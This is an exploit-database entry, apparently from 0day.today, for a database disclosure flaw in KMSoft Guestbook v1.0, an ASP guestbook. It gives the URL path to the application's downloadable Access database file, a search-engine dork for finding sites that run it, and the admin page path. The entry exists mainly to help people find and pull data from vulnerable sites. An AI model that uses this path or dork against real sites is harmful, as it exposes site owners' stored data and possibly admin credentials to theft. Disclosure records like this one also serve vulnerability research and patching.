id: 10602
date: 01/04/2010
title: KMSoft Guestbook v1.0 Database Disclosure Vulnerability
author: LionTurk
cves: 

=======================================================
KMSoft Guestbook v1.0 Database Disclosure Vulnerability
=======================================================

    [»] Script:             [ KMSoft Guestbook v 1.0 ] 
 
    [»] Language:           [ ASP ] 
 
    [»] Download:           [ http://kmsoft.org] 

===[ Exploit And Dork  ]=== 
 
    
 
  [»] http://server/[dizin]/db/db.mdb
 
  
 
 
  [»] KMSoft Guestbook v 1.0 Powered by KMSoft or  Powered by KMSoft
 
  [»]   Admin Page: /admin



#  0day.today [2023-03-27]  #